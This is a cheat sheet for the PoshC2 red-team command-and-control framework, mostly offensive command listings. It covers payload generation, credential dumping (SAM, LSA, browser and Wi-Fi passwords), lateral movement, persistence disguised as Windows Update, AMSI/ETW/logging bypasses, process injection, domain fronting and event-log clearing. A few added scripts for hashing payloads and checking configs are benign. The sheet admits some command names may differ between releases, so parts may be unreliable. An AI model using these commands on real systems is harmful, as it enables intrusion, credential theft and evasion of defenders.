# PoshC2 Framework Cheat Sheet

## Overview

PoshC2 is a proxy-aware command-and-control (C2) framework developed by Nettitude for red-team and post-exploitation work. The server side is written in Python; implants are available in PowerShell, C# and Python. It ships lateral-movement tooling and full HTTP/HTTPS proxy support so that implants can call back from restricted, proxied corporate networks.

Warning: this tool is intended for authorised penetration tests and red-team exercises only. Make sure you have written authorisation before using it in any environment.

## Installation

### Ubuntu/Debian installation

```bash
# Update the system
sudo apt update && sudo apt upgrade -y

# Install the build and Python dependencies
sudo apt install curl python3 python3-pip python3-dev git build-essential

# Clone PoshC2
git clone https://github.com/nettitude/PoshC2.git
cd PoshC2

# Install PoshC2 (installs the system packages, the Python environment and the posh-* wrapper scripts)
sudo ./Install.sh

# Alternative: run the installer straight from the repository
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash

# Alternative pip installation
pip3 install poshc2
```

### Docker installation

```bash
# Pull the PoshC2 Docker image
docker pull nettitude/poshc2

# Run PoshC2 in Docker, publishing the HTTP and HTTPS listener ports
docker run -it -p 443:443 -p 80:80 nettitude/poshc2

# Run with persistent project data (bind-mount the project directory so the
# database, config and payloads survive container restarts)
docker run -it -v /opt/poshc2:/opt/PoshC2_Project nettitude/poshc2
```

### Manual installation

```bash
# Install the Python dependencies
pip3 install -r requirements.txt

# Install the compilers used to build the Windows payloads
sudo apt install mingw-w64 mono-mcs

# Initialise the project database
python3 -c "from poshc2.server.database.DBUtil import *; initializedb()"
```

## Basic usage

The installer provides four wrapper commands: `posh-project` manages projects, `posh-config` edits the current project's `config.yml`, `posh-server` runs the C2 server and `posh` opens the implant handler. Each project has its own configuration, database and payload directory.

### Create a project and start the server

```bash
# Create a new project (this also makes it the current project)
posh-project -n ProjectName

# List existing projects
posh-project -l

# Switch to an existing project
posh-project -s ProjectName

# Edit the current project's config.yml (comms host, ports, User-Agent, ...) before the first start
posh-config

# Start the C2 server; the payload set is generated into the project's payloads directory
posh-server

# In a second terminal, attach the implant handler as a named operator
posh -u operator
```

## Command reference

The command names in the tables below are those listed in this sheet; confirm them against the `help` output of your installed version, because names and arguments have changed between PoshC2 releases.

### Server management

| Command | Description |
|---|---|
| `help` | Display the help menu |
| `show-urls` | Show the payload URLs |
| `list-implants` | List active implants |
| `implant-handler` | Enter the implant handler |
| `quit` | Exit PoshC2 |

### Implant handler commands

| Command | Description |
|---|---|
| `help` | Show implant commands |
| `back` | Return to the main menu |
| `list-implants` | List all implants |
| `use <implant-id>` | Select an implant |
| `kill <implant-id>` | Kill an implant |
| `remove-implant <implant-id>` | Remove an implant from the database |

### Implant interaction

| Command | Description |
|---|---|
| `help` | Show available commands |
| `shell <command>` | Execute a shell command |
| `upload-file <local> <remote>` | Upload a file |
| `download-file <remote>` | Download a file |
| `screenshot` | Take a screenshot |
| `get-system` | Attempt privilege escalation to SYSTEM |

## Payload generation

`posh-server` generates the complete payload set from the project's `config.yml` when it starts and writes it to the project's `payloads` directory. Payloads with different comms settings are created afterwards from the implant handler:

```bash
# Inside the implant handler (posh):

# Generate a fresh payload set for the current configuration
createnewpayload

# Generate a payload set that calls back through an HTTP proxy
# (prompts for the proxy URL, username and password)
createproxypayload

# Generate a daisy-chain payload set that calls back via an existing implant
createdaisypayload
```

The families in the generated set are:

### PowerShell payloads

- PowerShell one-liner and Base64-encoded variants
- Proxy-aware PowerShell (from `createproxypayload`)

### Executable payloads

- Windows executable (`.exe`)
- DLL (`.dll`)
- Service executable

### Web payloads

- HTA
- Office macro
- JavaScript

### Linux payloads

- Python dropper
- Shell dropper
- ELF

## Proxy configuration

### HTTP proxy support

```bash
# Configure an HTTP proxy
set-proxy http://proxy.company.com:8080

# Configure an authenticated proxy
set-proxy http://username:password@proxy.company.com:8080

# Configure a SOCKS proxy
set-proxy socks5://proxy.company.com:1080
```

### Proxy chain configuration

```bash
# Chain several proxies (comma-separated, traversed in order)
set-proxy-chain http://proxy1:8080,socks5://proxy2:1080

# Proxy chain with authentication
set-proxy-chain http://user:pass@proxy1:8080,http://proxy2:3128
```

### Proxy testing

```bash
# Test proxy connectivity
test-proxy http://proxy.company.com:8080

# Test proxy authentication
test-proxy http://username:password@proxy.company.com:8080
```

## Post-exploitation commands

### System information

```bash
# Get system information
get-computerinfo

# Get the current user
whoami

# Get domain information
get-domain

# Get local users
get-localuser

# Get local groups
get-localgroup
```

### Credential harvesting

These commands read protected secrets (SAM, LSA, cached logons) and need local administrator or SYSTEM rights on the implant host; run `get-system` first if the implant is running as a standard user.

```bash
# Dump the SAM database
hashdump

# Dump LSA secrets
lsa-secrets

# Dump cached domain credentials
cachedump

# Extract browser-stored passwords
get-browserdata

# Dump saved Wi-Fi passwords
get-wifipasswords
```

### Active Directory enumeration

```bash
# Get domain controllers
get-domaincontroller

# Get domain users
get-domainuser

# Get domain groups
get-domaingroup

# Get domain computers
get-domaincomputer

# Get domain admins
get-domainadmin
```

### Lateral movement

```bash
# WMI execution
invoke-wmiexec -target 192.168.1.10 -command "whoami"

# PsExec-style execution (creates a service on the target)
invoke-psexec -target 192.168.1.10 -command "whoami"

# SMB execution
invoke-smbexec -target 192.168.1.10 -command "whoami"

# DCOM execution
invoke-dcomexec -target 192.168.1.10 -command "whoami"
```

### Persistence

```bash
# Registry Run-key persistence
new-persistence -method registry -key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Scheduled task persistence
new-persistence -method scheduledtask -taskname "WindowsUpdate"

# Service persistence
new-persistence -method service -servicename "WindowsUpdateService"

# WMI event subscription persistence
new-persistence -method wmi -eventname "ProcessStart"
```

## Advanced features

### PowerShell modules

```bash
# Load a PowerShell module from disk into the implant
loadmodule /path/to/module.ps1

# Import PowerView
loadmodule PowerView

# Import Invoke-Mimikatz
loadmodule Invoke-Mimikatz

# Import PowerUp
loadmodule PowerUp
```

### .NET assembly execution

```bash
# Execute a .NET assembly
run-exe /path/to/assembly.exe arguments

# Execute a .NET assembly in memory
run-exe-inmemory /path/to/assembly.exe arguments

# Reflective DLL loading
invoke-reflectivedllinjection /path/to/dll.dll
```

### Process injection

```bash
# Inject shellcode into a running process
inject-shellcode -processid 1234 -shellcode <base64>

# Process hollowing
invoke-processhollowing -target notepad.exe -payload /path/to/payload.exe

# DLL injection
invoke-dllinjection -processid 1234 -dllpath /path/to/dll.dll
```

### Network operations

```bash
# Port scanning
invoke-portscan -hosts 192.168.1.0/24 -ports 22,80,443,3389

# Network discovery
invoke-networkscan -subnet 192.168.1.0/24

# SMB enumeration
invoke-smbenum -target 192.168.1.10

# Share enumeration
invoke-shareenum -target 192.168.1.10
```

## Evasion techniques

### AMSI bypass

```bash
# AMSI bypass
amsi-bypass

# Custom AMSI bypass
amsi-bypass -method custom

# Reflection-based bypass
amsi-bypass -method reflection
```

### ETW bypass

```bash
# ETW bypass
etw-bypass

# Disable ETW logging
disable-etw

# Patch ETW functions
patch-etw
```

### PowerShell logging bypass

```bash
# Disable PowerShell logging
disable-pslogging

# Bypass script block logging
bypass-scriptblocklogging

# Disable module logging
disable-modulelogging
```

### Obfuscation

```bash
# Obfuscate a PowerShell command
invoke-obfuscation -command "Get-Process"

# String obfuscation
obfuscate-string "sensitive string"

# Variable obfuscation
obfuscate-variables
```

## Pivoting and tunneling

### SOCKS proxy

```bash
# Start a SOCKS proxy through the implant
start-socksproxy -port 1080

# Stop the SOCKS proxy
stop-socksproxy

# List proxy connections
list-socksproxy
```

### Port forwarding

```bash
# Local port forward
portforward -localport 8080 -remotehost 192.168.2.10 -remoteport 80

# Reverse port forward
portforward -reverse -localport 9090 -remotehost 127.0.0.1 -remoteport 22

# Stop a port forward
stop-portforward -id 1
```

### Beacon chaining

PoshC2 calls this daisy chaining: an implant on a host with no direct egress (the child) sends its traffic through an implant that can reach the C2 server (the parent).

```bash
# Create a beacon chain
new-beacon -parent <parent-id> -child <child-id>

# List beacon chains
list-beacons

# Remove a beacon chain
remove-beacon -id <beacon-id>
```

## Operational security

### Communications security

```bash
# Use HTTPS for implant communications
set-comms https

# Set a custom User-Agent (match what the target's browsers actually send)
set-useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Add custom HTTP headers
set-headers "X-Forwarded-For: 192.168.1.100"

# Domain fronting: connect to the CDN hostname, send the real host in the Host header
set-domainfront cdn.example.com
```

### Payload security

```bash
# Encrypt payloads
encrypt-payload -key "encryption-key"

# Sign payloads with a code-signing certificate
sign-payload -cert /path/to/cert.pfx

# Obfuscate payloads
obfuscate-payload -method xor
```
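
Keeping a SHA-256 manifest of every payload generated for an engagement lets you match an artefact found on a host, or reported by the client's SOC, back to your payload set and prove it was yours during cleanup and deconfliction. The shell functions below are an added example of that practice; they are not part of this sheet or of PoshC2. They assume a flat directory of payload files such as the project's `payloads` directory; the files used in the demo are constructed stand-ins, not real payloads.

```bash
#!/usr/bin/env bash
# Added example: hash manifest for a directory of generated payloads.
# Assumption: payloads sit as plain files in one directory (e.g. the project's payloads dir).

# sha256_of FILE -> hex digest (sha256sum on Linux, shasum on macOS)
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# build_manifest PAYLOAD_DIR MANIFEST_FILE -> writes "sha256 size filename" per payload
# and prints the number of payloads recorded. Keep MANIFEST_FILE outside PAYLOAD_DIR.
build_manifest() {
  local dir="$1" out="$2" f
  : > "$out"
  for f in "$dir"/*; do
    [ -f "$f" ] || continue
    printf '%s %s %s\n' "$(sha256_of "$f")" "$(wc -c < "$f" | tr -d ' ')" "$(basename "$f")" >> "$out"
  done
  wc -l < "$out" | tr -d ' '
}

# lookup_hash MANIFEST_FILE SHA256 -> prints the payload filename; returns 1 if the hash is not ours
lookup_hash() {
  awk -v h="$2" '$1 == h { print $3; found = 1 } END { exit !found }' "$1"
}

# Demo with constructed stand-in files (not real payloads)
demo_dir=$(mktemp -d)
demo_manifest=$(mktemp)
printf 'constructed payload A\n' > "$demo_dir/payload.exe"
printf 'constructed payload B\n' > "$demo_dir/payload.hta"
echo "recorded $(build_manifest "$demo_dir" "$demo_manifest") payloads"
lookup_hash "$demo_manifest" "$(sha256_of "$demo_dir/payload.hta")"
rm -rf "$demo_dir" "$demo_manifest"
```

Regenerate the manifest every time the payload set is rebuilt (each `createnewpayload` run changes the hashes) and hand it over with the engagement report so the client can sweep for leftovers.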

### Anti-forensics

Clearing the Windows event logs is itself a high-signal event: the Security log records Event ID 1102 and the System log Event ID 104 when a log is cleared, and a monitored estate will alert on both. Use these only when the rules of engagement call for it, and record every action for the post-engagement cleanup report.

```bash
# Clear event logs
clear-eventlogs

# Timestomp a file (set its timestamps to the given value)
timestomp -file /path/to/file -time "01/01/2020 12:00:00"

# Securely delete a file
sdelete -file /path/to/file

# Clear tracks
clear-tracks
```

## Troubleshooting

### Connectivity problems

```bash
# Check implant connectivity
test-connectivity

# Show the current proxy settings
show-proxy

# Test DNS resolution from the implant host
test-dns google.com

# List the host firewall rules
get-firewallrules
```

### Payload problems

```bash
# Regenerate the payload set
regenerate-payloads

# Test payload execution
test-payload /path/to/payload.exe

# Check whether the payload is flagged by AV
test-av /path/to/payload.exe
```

### Performance problems

```bash
# Set the beacon (sleep) interval in seconds
set-beacon-time 30

# Set the jitter as a fraction of the interval (0.2 = each sleep varies by up to 20%)
set-jitter 0.2

# Reduce payload size
compress-payload
```
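
The interval and jitter together define the window an implant's check-ins should fall into, which is the same window a defender hunts for when looking for beaconing. The script below is an added example, not part of this sheet or of PoshC2: it computes the sleep window for a given interval and jitter (jitter taken as a fraction of the interval, as in the `set-jitter` line above) and then counts how many gaps in a constructed check-in log fall outside that window. Use it on your own listener logs to confirm an implant is sleeping as configured; a run of out-of-window gaps usually means a proxy is buffering requests or the host is being put to sleep.

```bash
#!/usr/bin/env bash
# Added example: beacon sleep window and check-in cadence check.
# Assumptions: jitter is a fraction in [0,1]; the log is "HH:MM:SS METHOD PATH" per check-in,
# all within one day so times can be compared as seconds.

# Constructed check-in log (not a real listener log)
SAMPLE_CHECKINS='10:00:00 GET /page.html
10:00:25 GET /page.html
10:00:55 GET /page.html
10:01:31 GET /page.html
10:02:21 GET /page.html'

# beacon_window INTERVAL_SECONDS JITTER -> "MIN MAX": the shortest and longest sleep
# an implant with that setting should produce. Fails if the jitter is out of range.
beacon_window() {
  awk -v i="$1" -v j="$2" 'BEGIN {
    if (j < 0 || j > 1) { print "jitter must be between 0 and 1" > "/dev/stderr"; exit 1 }
    printf "%d %d\n", int(i * (1 - j)), int(i * (1 + j) + 0.999999)
  }'
}

# count_out_of_window INTERVAL JITTER < log -> "TOTAL_GAPS OUT_OF_WINDOW_GAPS"
count_out_of_window() {
  local win min max
  win=$(beacon_window "$1" "$2") || return 1
  min=${win% *}; max=${win#* }
  awk -v min="$min" -v max="$max" '
    {
      split($1, t, ":"); now = t[1] * 3600 + t[2] * 60 + t[3]
      if (NR > 1) { d = now - prev; total++; if (d < min || d > max) out++ }
      prev = now
    }
    END { printf "%d %d\n", total, out }'
}

# Demo: interval 30s, jitter 0.2 -> window 24..36s; the 50s gap in the sample is flagged
echo "window: $(beacon_window 30 0.2)"
printf '%s\n' "$SAMPLE_CHECKINS" | count_out_of_window 30 0.2
```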

### Database problems

```bash
# Repair the database
repair-database

# Back up the database
backup-database /path/to/backup

# Restore the database
restore-database /path/to/backup
```

## Configuration

### Server configuration

```yaml
# config.yml
PayloadCommsHost: "https://c2.example.com"
PayloadCommsPort: "443"
DomainFrontHeader: "cdn.example.com"
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Referrer: "https://google.com"
ServerHeader: "Apache/2.4.41"
HTTPResponse: "404"
```

### Proxy configuration

```yaml
# Proxy settings
ProxyURL: "http://proxy.company.com:8080"
ProxyUser: "username"
ProxyPass: "password"
ProxyType: "http"  # http, socks4, socks5
```
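
A mismatch between these keys is the usual reason a freshly generated payload never calls back: a port in `PayloadCommsHost` that differs from `PayloadCommsPort`, a `DomainFrontHeader` that equals the CDN hostname (so nothing is actually fronted), or a `ProxyURL` whose scheme does not match `ProxyType`. The script below is an added example that checks those relationships before `posh-server` is started; it is not part of this sheet or of PoshC2. It assumes the flat `Key: value` YAML shown above (the sample it embeds is constructed) and uses the `ProxyURL`/`ProxyType` keys from the proxy settings block.

```bash
#!/usr/bin/env bash
# Added example: consistency checks for a PoshC2-style config.yml.
# Assumptions: flat "Key: value" YAML with optional quotes and trailing "# comments".

# Constructed sample config (not a real project file)
SAMPLE_CONFIG='PayloadCommsHost: "https://c2.example.com"
PayloadCommsPort: "443"
DomainFrontHeader: "cdn.example.com"
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
ServerHeader: "Apache/2.4.41"
ProxyURL: "http://proxy.company.com:8080"
ProxyType: "http"  # http, socks4, socks5
'

# cfg_get FILE KEY -> value of KEY with surrounding quotes and trailing comment stripped
cfg_get() {
  sed -n "s/^$2:[[:space:]]*\"\{0,1\}\([^\"#]*\)\"\{0,1\}.*/\1/p" "$1" | head -n1 | sed 's/[[:space:]]*$//'
}

# url_host URL -> hostname without scheme, port or path
url_host() {
  local h="${1#*://}"
  h="${h%%/*}"
  printf '%s\n' "${h%%:*}"
}

# url_port URL -> explicit port, else the scheme default (80/443), else ""
url_port() {
  local url="$1" hostport port=""
  hostport="${url#*://}"; hostport="${hostport%%/*}"
  case "$hostport" in
    *:*) port="${hostport##*:}" ;;
    *) case "$url" in https://*) port=443 ;; http://*) port=80 ;; esac ;;
  esac
  printf '%s\n' "$port"
}

# check_config FILE -> prints findings; returns 0 if consistent, 1 if any FAIL was found
check_config() {
  local file="$1" host port front ptype purl rc=0
  host=$(cfg_get "$file" PayloadCommsHost)
  port=$(cfg_get "$file" PayloadCommsPort)
  front=$(cfg_get "$file" DomainFrontHeader)
  ptype=$(cfg_get "$file" ProxyType)
  purl=$(cfg_get "$file" ProxyURL)

  case "$host" in
    https://*) ;;
    http://*)  echo "WARN: PayloadCommsHost uses plaintext HTTP; implant traffic is readable on the wire" ;;
    *)         echo "FAIL: PayloadCommsHost must start with http:// or https://"; rc=1 ;;
  esac

  # The port embedded in (or implied by) the host URL must match PayloadCommsPort,
  # otherwise the generated payloads call back to a port nothing listens on.
  if [ -n "$host" ] && [ "$(url_port "$host")" != "$port" ]; then
    echo "FAIL: PayloadCommsHost implies port $(url_port "$host") but PayloadCommsPort is $port"; rc=1
  fi

  # Domain fronting only works when the Host header differs from the hostname in the URL.
  if [ -n "$front" ] && [ "$front" = "$(url_host "$host")" ]; then
    echo "FAIL: DomainFrontHeader equals the comms hostname; fronting needs a different Host header"; rc=1
  fi

  if [ -n "$purl" ] && [ -n "$ptype" ]; then
    case "$purl" in
      "$ptype://"*) ;;
      *) echo "FAIL: ProxyURL scheme does not match ProxyType ($ptype)"; rc=1 ;;
    esac
  fi
  case "$purl" in
    *@*) echo "WARN: credentials embedded in ProxyURL; prefer ProxyUser/ProxyPass" ;;
  esac
  return "$rc"
}

# Demo run against the constructed sample
demo_file=$(mktemp)
printf '%s' "$SAMPLE_CONFIG" > "$demo_file"
check_config "$demo_file" && echo "config OK"
rm -f "$demo_file"
```

Run it as `check_config /var/poshc2/<project>/config.yml` (or whatever path your install uses) after `posh-config` and before `posh-server`; a non-zero exit means at least one FAIL line was printed.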

## Resources

- [PoshC2 GitHub Repository](https://github.com/nettitude/PoshC2)
- PoshC2 Documentation (LINK_4)
- Nettitude Blog (LINK_4)
- PoshC2 Wiki (LINK_4)

*This cheat sheet is a reference for using the PoshC2 framework. Always make sure you have appropriate authorisation before using this tool in any environment.*